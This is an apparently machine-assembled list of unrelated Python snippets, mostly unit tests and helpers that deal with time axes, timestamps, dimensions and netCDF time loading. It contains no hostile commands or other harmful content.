common_axis does not yet support differing units\",axis1.units,\" and \",axis2.units\n return None\n if axis1.isTime() or axis2.isTime():\n if not axis2.isTime() or not axis1.isTime():\n print \"ERROR. In common_axis, one axis is time, not the other\"\n return None\n if not axis1.calendar==axis2.calendar:\n print \"ERROR. common_axis does not yet support differing calendars.\"\n if len(axis1)==1 and len(axis2)==1:\n # There's just one time value, probably from averaging over time. The time value is meaningless\n # but it would be messy to have two.\n return (axis1,[0],[0])\n\n # to do: similar checks using isLatitude and isLongitude and isLevel <<<<<<\n # Also, transfer long_name, standard_name, axis attributes if in agreement;\n # units and calendar attributes should always be transferred if present.\n # Also to do: use bounds if available\n a12 = numpy.concatenate( [ axis1.getData(), axis2.getData() ] )\n a3, a12indexina3 = numpy.unique( a12, return_inverse=True )\n #... a3 has only unique indices and is sorted (unfortunately, uniqueness is based on exact identity,\n # not to some numerical tolerance). For an i index into a12 (thus 0<=i<len(axis1)+len(axis2),\n # j is an index into a3 such that, if a12indexina3[i]==j, then a1[i]==a3[j].\n a1indexina3 = a12indexina3[0:len(axis1)]\n a2indexina3 = a12indexina3[len(axis1):len(axis1)+len(axis2)]\n\n if hasattr(axis1,'id') and hasattr(axis2,'id') and axis1.id==axis2.id :\n vid = axis1.id\n else:\n vid = None\n axis3 = cdms2.createAxis( a3, bounds=None, id=vid )\n axis3.units = units1\n return (axis3,a1indexina3,a2indexina3)", "def test_analyze_time(self):\n self.ph5validate.analyze_time()\n self.assertEqual(self.ph5validate.das_time.keys(), [('12183', 1, 500)])\n Dtime = self.ph5validate.das_time[('12183', 1, 500)]\n\n # 3 different deploy time\n self.assertEqual(len(Dtime['time_windows']), 5)\n\n # station 9001\n self.assertEqual(Dtime['time_windows'][0],\n (1550849950, 1550850034, '9001'))\n self.assertEqual(Dtime['time_windows'][1],\n (1550849950, 1550850034, '9001'))\n self.assertEqual(Dtime['time_windows'][2],\n (1550849950, 1550850034, '9001'))\n # station 9002\n self.assertEqual(Dtime['time_windows'][3],\n (1550850043, 1550850093, '9002'))\n # station 9003\n self.assertEqual(Dtime['time_windows'][4],\n (1550850125, 1550850187, '9003'))\n\n self.assertEqual(Dtime['min_deploy_time'],\n [1550849950,\n 'Data exists before deploy time: 7 seconds.'])", "def test_issue_tracked_times(self):\n pass", "def graph_has_temporal(g):\n return any(any(edge.get(p) == 'time' for p in {'argmax', 'argmin', 'type'}) or 'num' in edge for edge in g.get('edgeSet', []))", "def test_some_meet(self, initial_placement_fixture):\n assert len(ctx.cluster.influx_db.aggregate_performance()) == 0, \\\n \"Test should run on the basic model\"\n self.generic_function(above_objective=2)", "async def test_has_group_address_custom_time(self):\n xknx = XKNX()\n self.datetime = DateTime(\n xknx,\n \"TestDateTime\",\n group_address=\"1/2/3\",\n group_address_state=\"1/2/4\",\n localtime=False,\n )\n assert self.datetime.has_group_address(GroupAddress(\"1/2/3\"))\n assert self.datetime.has_group_address(GroupAddress(\"1/2/4\"))", "def is_time(self) -> bool:\n return self.times > 1", "def is_temporal(self, e):\n if e in self.temporal:\n return True", "def test_timestamp_spacing_one_timestamp(times):\n assert_series_equal(\n time.spacing(times[[0]], times.freq),\n pd.Series(True, index=[times[0]])\n )", "def test_month_starts_and_ends(self):\n # @REVIEWED\n # @todo Optimize by 
combine start and end tests.\n\n startCnt = 0\n endCnt = 0\n\n def test_starts(timeColName, dataType):\n global startCnt\n self.logger.log('testing {},{}'.format(timeColName, dataType))\n\n # Take every other value from the unzipped pairs.\n starts = [x for x in itertools.islice(\n zip(*self.aggregator.monthStartsAndEnds(timeColName, dataType)),\n 0, None, 2)]\n startCnt = len(starts)\n\n # Test on the flattened start values.\n self.assertLessEqual(len(filter(\n lambda x: x.time() != datetime.strptime('00:00:00',\n '%H:%M:%S').time(),\n list(itertools.chain.from_iterable(starts)))), 1)\n\n def test_ends(timeColName, dataType):\n global endCnt\n self.logger.log('testing {},{}'.format(timeColName, dataType))\n\n # Take every other value from the unzipped pairs.\n ends = [x for x in itertools.islice(\n zip(*self.aggregator.monthStartsAndEnds(timeColName, dataType)),\n 1, None, 2)]\n endCnt = len(ends)\n\n # Test on the flattened end values.\n self.assertLessEqual(len(filter(\n lambda x: x.time() != self.aggregator.incrementEndpoint(\n datetime.strptime('23:59:59', '%H:%M:%S')).time(),\n list(itertools.chain.from_iterable(ends)))), 1)\n\n for myType in ['weather', 'egauge', 'circuit', 'irradiance']:\n if myType == 'egauge':\n test_starts('datetime', myType)\n test_ends('datetime', myType)\n else:\n test_starts('timestamp', myType)\n test_ends('timestamp', myType)\n self.assertEquals(startCnt, endCnt)", "def test_alternate_spatial_axes(conv1d_placeholder, output_size, width_axis):\n width_axis.name = \"time\"\n assert len(conv1d_placeholder.axes.find_by_name(\"time\")) == 1\n\n conv_layer = Convolution((3, output_size), lambda x: 1)\n with pytest.raises(IncompatibleAxesError):\n conv_layer(conv1d_placeholder)\n # As a dictionary\n output = conv_layer(conv1d_placeholder, spatial_axes={\"W\": \"time\"})\n assert output.axes == conv1d_placeholder.axes\n # As a tuple\n output = conv_layer(conv1d_placeholder, spatial_axes=(\"D\", \"H\", \"time\"))\n assert output.axes == conv1d_placeholder.axes", "def test_plt_v3offset_time():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_v3offset_time()\n\n assert bokeh_plot_type == type(result)", "def test_dim_None(a, b, metrics):\n metric, _metric = metrics\n if metric in [effective_sample_size, spearman_r_eff_p_value, pearson_r_eff_p_value]:\n with pytest.raises(ValueError) as excinfo:\n metric(a, b, dim=None)\n assert (\n \"Effective sample size should only be applied to a singular time dimension.\"\n in str(excinfo.value)\n )\n else:\n metric, _metric = metrics\n res = metric(a, b, dim=None)\n assert len(res.dims) == 0, print(res.dims)", "def test_map_args_include_time():\n pass", "def test_get_integration_time_shape():\n test_file = os.path.join(DATA_PATH, \"paper_test_file.uvh5\")\n test_uv = UVData()\n test_uv.read(test_file)\n\n baseline_array = np.array(list(set(test_uv.baseline_array)))\n inttime_array = utils.get_integration_time(test_uv, reds=baseline_array)\n test_shape = (test_uv.Nbls, test_uv.Ntimes)\n assert test_shape == inttime_array.shape", "def test_duration_argument_skipped(self):\n d = DurationMixin()\n self.assertEqual(d.duration, 0)", "def test_contains_bounds(self):\n dim = Dimension(\"yolo\", \"uniform\", -3, 4)\n with pytest.raises(NotImplementedError):\n assert -3 in dim", "def test_all_repetition_frequency_have_timedelta(self):\n for value in EventRepetitionFrequency:\n if value is EventRepetitionFrequency.not_repeated:\n 
self.assertIsNone(value.to_timedelta())\n else:\n self.assertIsNotNone(value.to_timedelta())", "def test_index_at_20101206():\r\n A = np.random.standard_normal(40)\r\n #negative t0\r\n TS_A = ts.TimeSeries(A, t0=-20, sampling_interval=2)\r\n npt.assert_equal(TS_A.time.index_at(TS_A.time), np.arange(40))\r\n #positive t0\r\n TS_A = ts.TimeSeries(A, t0=15, sampling_interval=2)\r\n npt.assert_equal(TS_A.time.index_at(TS_A.time), np.arange(40))\r\n #no t0\r\n TS_A = ts.TimeSeries(A, sampling_interval=2)\r\n npt.assert_equal(TS_A.time.index_at(TS_A.time), np.arange(40))", "def test_plot_ts_multidim(kwargs):\n nchains = 4\n ndraws = 500\n ndim1 = 5\n ndim2 = 7\n data = {\n \"y\": np.random.normal(size=(ndim1, ndim2)),\n \"z\": np.random.normal(size=(ndim1, ndim2)),\n }\n\n posterior_predictive = {\n \"y\": np.random.randn(nchains, ndraws, ndim1, ndim2),\n \"z\": np.random.randn(nchains, ndraws, ndim1, ndim2),\n }\n\n const_data = {\"x\": np.arange(1, 6), \"x_pred\": np.arange(5, 10)}\n\n idata = from_dict(\n observed_data=data,\n posterior_predictive=posterior_predictive,\n constant_data=const_data,\n dims={\n \"y\": [\"dim1\", \"dim2\"],\n \"z\": [\"holdout_dim1\", \"holdout_dim2\"],\n },\n coords={\n \"dim1\": range(ndim1),\n \"dim2\": range(ndim2),\n \"holdout_dim1\": range(ndim1 - 1, ndim1 + 4),\n \"holdout_dim2\": range(ndim2 - 1, ndim2 + 6),\n },\n )\n\n ax = plot_ts(idata=idata, y=\"y\", plot_dim=\"dim1\", **kwargs)\n assert np.all(ax)", "def isDefaultedAt(self, time):\n return time > self.getDefaultTime()", "def test_contains(self):\n dim = Fidelity(\"epoch\", 1, 10)\n\n assert 0 not in dim\n assert 1 in dim\n assert 5 in dim\n assert 10 in dim\n assert 20 not in dim", "def test_cast(self):\n dim = Fidelity(\"epoch\", 1, 10)\n with pytest.raises(NotImplementedError):\n dim.cast()", "def test_UniformTime_repr():", "def test_custom_time(self):\n interval = 0.5\n M = simulation.StateMonitor(self.G, 'v', interval=interval)\n sim = simulation.Simulation(self.G, M, dt=self.dt)\n sim.run(self.t_max)\n self.assertTrue(np.allclose(M.t, np.arange(0, self.t_max, interval)))", "def testNoneCanAppearInData(self):\n # Buffer makes comparison difficult because min/max aren't A & 9\n self.chart.auto_scale.buffer = 0\n self.AddToChart(self.chart, [1, None, 3])\n self.assertEqual(self.Param('chd'), 's:A_9')", "def _checkDT(self):\r\n dt = np.diff(self.tsec)\r\n \r\n dt_unique = np.unique(dt)\r\n \r\n if np.size(dt_unique) == 1:\r\n self.isequal = True\r\n else:\r\n self.isequal = False\r\n \r\n try:\r\n self.dt = dt[1]\r\n except:\r\n self.dt = 0.0", "def test_track_lv_only():\n track = np.arange(20).reshape(10,2)\n track2 = np.zeros((10,6))\n track2[:,0] = track[:,0]\n track2[:,2] = track[:,1]\n spiral_arm = survey.get_spiral_slice(track = track)\n spiral_arm2 = survey.get_spiral_slice(track = track2)\n\n assert np.allclose(spiral_arm[\"INTEN\"], spiral_arm2[\"INTEN\"], equal_nan = True)", "def test_default_axis_nxdata(self, nexus_base):\n assert isinstance(nexus_base.default_axis, np.ndarray)", "def test_timestamp_spacing_date_range(times):\n assert_series_equal(\n time.spacing(times, times.freq),\n pd.Series(True, index=times)\n )", "def test_timeseries_indexing():\n s = channel.Slice(channel.TimeSeries([14, 15, 16, 17], [4, 5, 6, 7]))\n\n np.testing.assert_equal(s[0:5].data, [14])\n np.testing.assert_equal(s[0:5].timestamps, [4])\n np.testing.assert_equal(s[4:5].data, [14])\n np.testing.assert_equal(s[4:5].timestamps, [4])\n np.testing.assert_equal(s[4:6].data, [14, 15])\n 
np.testing.assert_equal(s[4:6].timestamps, [4, 5])\n np.testing.assert_equal(s[4:10].data, [14, 15, 16, 17])\n np.testing.assert_equal(s[4:10].timestamps, [4, 5, 6, 7])\n\n with pytest.raises(IndexError) as exc:\n assert s[1]\n assert str(exc.value) == \"Scalar indexing is not supported, only slicing\"\n with pytest.raises(IndexError) as exc:\n assert s[1:2:3]\n assert str(exc.value) == \"Slice steps are not supported\"\n\n s = channel.Slice(channel.TimeSeries([], []))\n assert len(s[1:2].data) == 0\n assert len(s[1:2].timestamps) == 0", "def test_time_supp_length_matches_no_timesteps(self):\n for no_timesteps in [5, 578, 993, 300072]:\n for dt in [0.1, 0.5, 3.0]:\n test_rec = rt.Recording(np.empty([6, no_timesteps, 1]), dt=dt)\n self.assertEqual(\n len(test_rec.time_supp),\n no_timesteps,\n 'Expected length of time_supp {} to match no_timesteps of '\n 'input {}.'.format(len(test_rec.time_supp), no_timesteps),\n )", "def test_copy(self):\n timestamp = \"2020-01-01\"\n measurement_copy = Measurement(self.metric(), start=timestamp, end=timestamp).copy()\n self.assertNotIn(timestamp, measurement_copy[\"start\"], measurement_copy[\"end\"])", "def test_fields_effort_time_units_dictionary_success(self, _mock_check):\n field = EffortField(time_units={\"minute\": (\"minute\", \"minutes\")})\n\n errors = field.check()\n self.assertEqual(len(errors), 0)", "def test_masked_upsampling(scheme):\n np.random.seed(2)\n\n orig = DummyDataset(shape=(2, 360, 720))\n orig.homogenise_masks()\n\n orig.cube.data.mask = orig.cube.data > 100\n\n reg = regrid(orig.cube, scheme=scheme)\n\n # Find the time slices with values above the original maximum or below the\n # original minimum.\n\n reg_time_maxs = np.max(reg.data, axis=(1, 2))\n reg_time_mins = np.min(reg.data, axis=(1, 2))\n\n extreme_times = np.where((reg_time_maxs > 150) | (reg_time_mins < -500))[0]\n\n assert not np.any(extreme_times)\n\n assert reg.shape[0] == orig.cube.shape[0]\n assert np.all(np.array(reg.shape[1:]) == 2 * np.array(orig.cube.shape[1:]))", "def test_overplotting(self):\n arr = self.arr\n out = ternary(arr)\n self.assertTrue(hasattr(out, \"tax\"))\n out2 = ternary(arr, ax=out)\n self.assertTrue(out.tax is out2.tax) # hasn't added a new ternary axis", "def test_update_derived_metric(self):\n pass", "def test_none_meet(self, initial_placement_fixture):\n assert len(ctx.cluster.influx_db.aggregate_performance()) == 0, \\\n \"Test should run on the basic model\"\n self.generic_function(above_objective=0)", "def test_TimeSeries():\r\n\r\n #Test initialization with duration:\r\n tseries1 = ts.TimeSeries([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], duration=10)\r\n tseries2 = ts.TimeSeries([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], sampling_interval=1)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n\r\n #downsampling:\r\n t1 = ts.UniformTime(length=8, sampling_rate=2)\r\n #duration is the same, but we're downsampling to 1Hz\r\n tseries1 = ts.TimeSeries(data=[1, 2, 3, 4], time=t1, sampling_rate=1)\r\n #If you didn't explicitely provide the rate you want to downsample to, that\r\n #is an error:\r\n npt.assert_raises(ValueError, ts.TimeSeries, dict(data=[1, 2, 3, 4],\r\n time=t1))\r\n\r\n tseries2 = ts.TimeSeries(data=[1, 2, 3, 4], sampling_rate=1)\r\n tseries3 = ts.TimeSeries(data=[1, 2, 3, 4], sampling_rate=1000,\r\n time_unit='ms')\r\n #you can specify the sampling_rate or the sampling_interval, to the same\r\n #effect, where specificying the sampling_interval is in the units of that\r\n #time-series:\r\n tseries4 = ts.TimeSeries(data=[1, 2, 3, 4], 
sampling_interval=1,\r\n time_unit='ms')\r\n npt.assert_equal(tseries4.time, tseries3.time)\r\n\r\n #The units you use shouldn't matter - time is time:\r\n tseries6 = ts.TimeSeries(data=[1, 2, 3, 4],\r\n sampling_interval=0.001,\r\n time_unit='s')\r\n npt.assert_equal(tseries6.time, tseries3.time)\r\n\r\n #And this too - perverse, but should be possible:\r\n tseries5 = ts.TimeSeries(data=[1, 2, 3, 4],\r\n sampling_interval=ts.TimeArray(0.001,\r\n time_unit='s'),\r\n time_unit='ms')\r\n\r\n npt.assert_equal(tseries5.time, tseries3.time)\r\n\r\n #initializing with a UniformTime object:\r\n t = ts.UniformTime(length=3, sampling_rate=3)\r\n\r\n data = [1, 2, 3]\r\n\r\n tseries7 = ts.TimeSeries(data=data, time=t)\r\n\r\n npt.assert_equal(tseries7.data, data)\r\n\r\n data = [1, 2, 3, 4]\r\n #If the data is not the right length, that should throw an error:\r\n npt.assert_raises(ValueError,\r\n ts.TimeSeries, dict(data=data, time=t))\r\n\r\n # test basic arithmetics wiht TimeSeries\r\n tseries1 = ts.TimeSeries([1, 2, 3, 4, 5, 6, 7, 8, 9, 10], sampling_rate=1)\r\n tseries2 = tseries1 + 1\r\n npt.assert_equal(tseries1.data + 1, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n tseries2 -= 1\r\n npt.assert_equal(tseries1.data, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n tseries2 = tseries1 * 2\r\n npt.assert_equal(tseries1.data * 2, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)\r\n tseries2 /= 2\r\n npt.assert_equal(tseries1.data, tseries2.data)\r\n npt.assert_equal(tseries1.time, tseries2.time)", "def is_dimension_dynamic(dim) -> bool:\n return dim is None or dim <= 0", "def test_time_type_state_is_midmorning(day):\n\n assert day_time_info(day.hours_0).is_midmorning is False\n assert day_time_info(day.hours_1).is_midmorning is False\n assert day_time_info(day.hours_2).is_midmorning is False\n assert day_time_info(day.hours_3).is_midmorning is False\n assert day_time_info(day.hours_4).is_midmorning is False\n assert day_time_info(day.hours_5).is_midmorning is False\n assert day_time_info(day.hours_6).is_midmorning is False\n assert day_time_info(day.hours_7).is_midmorning is False\n assert day_time_info(day.hours_8).is_midmorning is False\n assert day_time_info(day.hours_9).is_midmorning is False\n assert day_time_info(day.hours_10).is_midmorning is True\n assert day_time_info(day.hours_11).is_midmorning is True\n assert day_time_info(day.hours_12).is_midmorning is False\n assert day_time_info(day.hours_13).is_midmorning is False\n assert day_time_info(day.hours_14).is_midmorning is False\n assert day_time_info(day.hours_15).is_midmorning is False\n assert day_time_info(day.hours_16).is_midmorning is False\n assert day_time_info(day.hours_17).is_midmorning is False\n assert day_time_info(day.hours_18).is_midmorning is False\n assert day_time_info(day.hours_19).is_midmorning is False\n assert day_time_info(day.hours_20).is_midmorning is False\n assert day_time_info(day.hours_21).is_midmorning is False\n assert day_time_info(day.hours_22).is_midmorning is False\n assert day_time_info(day.hours_23).is_midmorning is False", "def __check_per_timestep_params(\n self, variable, sampling_interval, indexes):\n if sampling_interval is not None:\n raise ValueError(\n f\"Variable {variable} does not support a sampling interval\")\n if indexes is not None:\n raise ValueError(\n f\"Variable {variable} can only be recorded \"\n \"on the whole population\")", "def test_plt_v2offset_time():\n\n ta = WATA()\n wata_data = define_testdata()\n ta.source = 
ColumnDataSource(data=wata_data)\n ta.add_time_column()\n ta.setup_date_range()\n result = ta.plt_v2offset_time()\n\n assert bokeh_plot_type == type(result)", "def test_sample_from_extra_bounds_good(self):\n dim = Real(\"yolo\", \"norm\", 0, 2, low=-5, high=+5, shape=(4, 4))\n for _ in range(8):\n samples = dim.sample(8)\n for sample in samples:\n assert sample in dim", "def test_baseupdated(self):\n self.assertEqual(datetime, type(BaseModel().updated_at))", "def test_is_time_druid_time_col(self):\n col = TableColumn(column_name=\"__time\", type=\"INTEGER\")\n self.assertEquals(col.is_dttm, None)\n DruidEngineSpec.alter_new_orm_column(col)\n self.assertEquals(col.is_dttm, True)\n\n col = TableColumn(column_name=\"__not_time\", type=\"INTEGER\")\n self.assertEquals(col.is_time, False)", "def test_reset_temporal_axis(PM_ds_control_3d_full):\r\n smooth = 10\r\n tsmooth_kws = {\"time\": smooth}\r\n first_ori = PM_ds_control_3d_full.time[0].values\r\n first_actual = _reset_temporal_axis(\r\n PM_ds_control_3d_full, tsmooth_kws=tsmooth_kws, dim=\"time\"\r\n ).time.values[0]\r\n first_expected = f\"{first_ori}-{first_ori+smooth*1-1}\"\r\n assert first_actual == first_expected", "def test_time_type_state_is_morning(day):\n\n assert day_time_info(day.hours_0).is_morning is False\n assert day_time_info(day.hours_1).is_morning is False\n assert day_time_info(day.hours_2).is_morning is False\n assert day_time_info(day.hours_3).is_morning is False\n assert day_time_info(day.hours_4).is_morning is False\n assert day_time_info(day.hours_5).is_morning is True\n assert day_time_info(day.hours_6).is_morning is True\n assert day_time_info(day.hours_7).is_morning is True\n assert day_time_info(day.hours_8).is_morning is True\n assert day_time_info(day.hours_9).is_morning is True\n assert day_time_info(day.hours_10).is_morning is False\n assert day_time_info(day.hours_11).is_morning is False\n assert day_time_info(day.hours_12).is_morning is False\n assert day_time_info(day.hours_13).is_morning is False\n assert day_time_info(day.hours_14).is_morning is False\n assert day_time_info(day.hours_15).is_morning is False\n assert day_time_info(day.hours_16).is_morning is False\n assert day_time_info(day.hours_17).is_morning is False\n assert day_time_info(day.hours_18).is_morning is False\n assert day_time_info(day.hours_19).is_morning is False\n assert day_time_info(day.hours_20).is_morning is False\n assert day_time_info(day.hours_21).is_morning is False\n assert day_time_info(day.hours_22).is_morning is False\n assert day_time_info(day.hours_23).is_morning is False", "def test_dimension_size_infer(self, nt=100):\n i, j, k = dimify('i j k')\n shape = tuple([d.size for d in [i, j, k]])\n a = DenseData(name='a', shape=shape).indexed\n b = TimeData(name='b', shape=shape, save=True, time_dim=nt).indexed\n eqn = Eq(b[time, x, y, z], a[x, y, z])\n op = Operator(eqn)\n\n _, op_dim_sizes = op.arguments()\n assert(op_dim_sizes[time.name] == nt)", "def test_one_meet(self, initial_placement_fixture):\n assert len(ctx.cluster.influx_db.aggregate_performance()) == 0, \\\n \"Test should run on the basic model\"\n self.generic_function(above_objective=1)", "def test_tas_fix():\n assert Tas is BaseTas", "def test_slice_other_dimension(self):\n for i, shape in enumerate([(3, 0), (1, 2, 0), (2, 0, 1)]):\n dset = self.f.create_dataset('x%d'%i, shape, dtype=int, maxshape=(None,)*len(shape))\n self.assertEqual(dset.shape, shape)\n out = dset[:1]\n self.assertIsInstance(out, np.ndarray)\n self.assertEqual(out.shape, (1,)+shape[1:])", 
"def test_subset_by_time(self):\n\n this_satellite_dict = satellite_io.subset_by_time(\n satellite_dict=copy.deepcopy(SATELLITE_DICT_ALL_EXAMPLES),\n desired_times_unix_sec=DESIRED_TIMES_UNIX_SEC\n )[0]\n\n self.assertTrue(compare_satellite_dicts(\n this_satellite_dict, SATELLITE_DICT_SUBSET_BY_TIME\n ))", "def test_datetime_field():", "def test_not_at_beginning(self):\n self.check_4_way('container', 'container or pod')", "def test_ensure_ts_double(self):\n self.assertEqual(ensure_ts(self.jobset3), 'ts')", "def should_fire(self, time_domain, timestamp, window, context):\n pass", "def test_interval_from_categorical(self, tdim2):\n low, high = tdim2.interval()\n assert (low == numpy.zeros(4)).all()\n assert (high == numpy.ones(4)).all()", "def test_interval(self):\n dim = Dimension(\"yolo\", \"uniform\", -3, 4)\n assert dim.interval(1.0) == (\n -3.0,\n 1.0,\n ) # reminder that `scale` is not upper bound", "def test_ensure_not_ts_ts(self):\n self.assertEqual(ensure_not_ts(self.jobset3), 'error')", "def test_time_type_state_is_afternoon(day):\n\n assert day_time_info(day.hours_0).is_afternoon is False\n assert day_time_info(day.hours_1).is_afternoon is False\n assert day_time_info(day.hours_2).is_afternoon is False\n assert day_time_info(day.hours_3).is_afternoon is False\n assert day_time_info(day.hours_4).is_afternoon is False\n assert day_time_info(day.hours_5).is_afternoon is False\n assert day_time_info(day.hours_6).is_afternoon is False\n assert day_time_info(day.hours_7).is_afternoon is False\n assert day_time_info(day.hours_8).is_afternoon is False\n assert day_time_info(day.hours_9).is_afternoon is False\n assert day_time_info(day.hours_10).is_afternoon is False\n assert day_time_info(day.hours_11).is_afternoon is False\n assert day_time_info(day.hours_12).is_afternoon is False\n assert day_time_info(day.hours_13).is_afternoon is True\n assert day_time_info(day.hours_14).is_afternoon is True\n assert day_time_info(day.hours_15).is_afternoon is True\n assert day_time_info(day.hours_16).is_afternoon is True\n assert day_time_info(day.hours_17).is_afternoon is True\n assert day_time_info(day.hours_18).is_afternoon is False\n assert day_time_info(day.hours_19).is_afternoon is False\n assert day_time_info(day.hours_20).is_afternoon is False\n assert day_time_info(day.hours_21).is_afternoon is False\n assert day_time_info(day.hours_22).is_afternoon is False\n assert day_time_info(day.hours_23).is_afternoon is False", "def test_contains_extra_bounds(self):\n dim = Real(\"yolo\", \"norm\", 0, 3, low=-3, high=+3)\n assert dists.uniform.rvs(-3, 3) in dim\n assert -4 not in dim\n assert +4 not in dim\n assert (1, 2) not in dim", "def isdt(self):\n return self.Units.isreftime and self._subarray.dtype == _dtype_object", "def test_time_type_state_is_evening(day):\n\n assert day_time_info(day.hours_0).is_evening is False\n assert day_time_info(day.hours_1).is_evening is False\n assert day_time_info(day.hours_2).is_evening is False\n assert day_time_info(day.hours_3).is_evening is False\n assert day_time_info(day.hours_4).is_evening is False\n assert day_time_info(day.hours_5).is_evening is False\n assert day_time_info(day.hours_6).is_evening is False\n assert day_time_info(day.hours_7).is_evening is False\n assert day_time_info(day.hours_8).is_evening is False\n assert day_time_info(day.hours_9).is_evening is False\n assert day_time_info(day.hours_10).is_evening is False\n assert day_time_info(day.hours_11).is_evening is False\n assert day_time_info(day.hours_12).is_evening is False\n assert 
day_time_info(day.hours_13).is_evening is False\n assert day_time_info(day.hours_14).is_evening is False\n assert day_time_info(day.hours_15).is_evening is False\n assert day_time_info(day.hours_16).is_evening is False\n assert day_time_info(day.hours_17).is_evening is False\n assert day_time_info(day.hours_18).is_evening is True\n assert day_time_info(day.hours_19).is_evening is True\n assert day_time_info(day.hours_20).is_evening is True\n assert day_time_info(day.hours_21).is_evening is True\n assert day_time_info(day.hours_22).is_evening is True\n assert day_time_info(day.hours_23).is_evening is False", "def test_default_axis_type(i07_nexus: I07Nexus, description):\n assert i07_nexus.default_axis_type == description", "def test_no_timestamp(self):\n self.assertRaises(PyntsError, extract_columns, self.data[['a', 'b']], ['a'], ['timestamp'])", "def _load_time(self):\n\n time_variables = ('time', 'Times', 'Itime', 'Itime2')\n got_time, missing_time = [], []\n for time in time_variables:\n # Since not all of the time_variables specified above are required, only try to load the data if they\n # exist. We'll raise an error if we don't find any of them though.\n if time in self.ds.variables:\n setattr(self.time, time, self.ds.variables[time][:])\n got_time.append(time)\n attributes = type('attributes', (object,), {})()\n for attribute in self.ds.variables[time].ncattrs():\n setattr(attributes, attribute, getattr(self.ds.variables[time], attribute))\n setattr(self.atts, time, attributes)\n else:\n missing_time.append(time)\n\n if len(missing_time) == len(time_variables):\n warn('No time variables found in the netCDF.')\n else:\n if 'Times' in got_time:\n # Overwrite the existing Times array with a more sensibly shaped one.\n self.time.Times = np.asarray([''.join(t.astype(str)).strip() for t in self.time.Times])\n\n # Make whatever we got into datetime objects and use those to make everything else. 
Note: the `time' variable\n # is often the one with the lowest precision, so use the others preferentially over that.\n if 'Times' not in got_time:\n if 'time' in got_time:\n _dates = num2date(self.time.time, units=getattr(self.ds.variables['time'], 'units'))\n elif 'Itime' in got_time and 'Itime2' in got_time:\n _dates = num2date(self.time.Itime + self.time.Itime2 / 1000.0 / 60 / 60, units=getattr(self.ds.variables['Itime'], 'units'))\n try:\n self.time.Times = np.array([datetime.strftime(d, '%Y-%m-%dT%H:%M:%S.%f') for d in _dates])\n except ValueError:\n self.time.Times = np.array([datetime.strftime(d, '%Y/%m/%d %H:%M:%S.%f') for d in _dates])\n # Add the relevant attribute for the Times variable.\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'Times', attributes)\n\n if 'time' not in got_time:\n if 'Times' in got_time:\n try:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y-%m-%dT%H:%M:%S.%f') for t in self.time.Times])\n except ValueError:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y/%m/%d %H:%M:%S.%f') for t in self.time.Times])\n elif 'Itime' in got_time and 'Itime2' in got_time:\n _dates = num2date(self.time.Itime + self.time.Itime2 / 1000.0 / 60 / 60, units=getattr(self.ds.variables['Itime'], 'units'))\n # We're making Modified Julian Days here to replicate FVCOM's 'time' variable.\n self.time.time = date2num(_dates, units='days since 1858-11-17 00:00:00')\n # Add the relevant attributes for the time variable.\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'units', 'days since 1858-11-17 00:00:00')\n setattr(attributes, 'long_name', 'time')\n setattr(attributes, 'format', 'modified julian day (MJD)')\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'time', attributes)\n\n if 'Itime' not in got_time and 'Itime2' not in got_time:\n if 'Times' in got_time:\n try:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y-%m-%dT%H:%M:%S.%f') for t in self.time.Times])\n except ValueError:\n _dates = np.array([datetime.strptime(''.join(t.astype(str)).strip(), '%Y/%m/%d %H:%M:%S.%f') for t in self.time.Times])\n elif 'time' in got_time:\n _dates = num2date(self.time.time, units=getattr(self.ds.variables['time'], 'units'))\n # We're making Modified Julian Days here to replicate FVCOM's 'time' variable.\n _datenum = date2num(_dates, units='days since 1858-11-17 00:00:00')\n self.time.Itime = np.floor(_datenum)\n self.time.Itime2 = (_datenum - np.floor(_datenum)) * 1000 * 60 * 60 # microseconds since midnight\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'units', 'days since 1858-11-17 00:00:00')\n setattr(attributes, 'format', 'modified julian day (MJD)')\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'Itime', attributes)\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'units', 'msec since 00:00:00')\n setattr(attributes, 'time_zone', 'UTC')\n setattr(self.atts, 'Itime2', attributes)\n\n # Additional nice-to-have time representations.\n if 'Times' in got_time:\n try:\n self.time.datetime = np.array([datetime.strptime(d, '%Y-%m-%dT%H:%M:%S.%f') for d in self.time.Times])\n except ValueError:\n self.time.datetime = np.array([datetime.strptime(d, '%Y/%m/%d %H:%M:%S.%f') for d in self.time.Times])\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'long_name', 'Python datetime.datetime')\n setattr(self.atts, 'datetime', 
attributes)\n else:\n self.time.datetime = _dates\n self.time.matlabtime = self.time.time + 678942.0 # convert to MATLAB-indexed times from Modified Julian Date.\n attributes = type('attributes', (object,), {})()\n setattr(attributes, 'long_name', 'MATLAB datenum')\n setattr(self.atts, 'matlabtime', attributes)\n\n # Clip everything to the time indices if we've been given them. Update the time dimension too.\n if 'time' in self._dims:\n if all([isinstance(i, (datetime, str)) for i in self._dims['time']]):\n # Convert datetime dimensions to indices in the currently loaded data.\n self._dims['time'][0] = self.time_to_index(self._dims['time'][0])\n self._dims['time'][1] = self.time_to_index(self._dims['time'][1]) + 1 # make the indexing inclusive\n for time in self.obj_iter(self.time):\n setattr(self.time, time, getattr(self.time, time)[self._dims['time'][0]:self._dims['time'][1]])\n self.dims.time = len(self.time.time)" ]
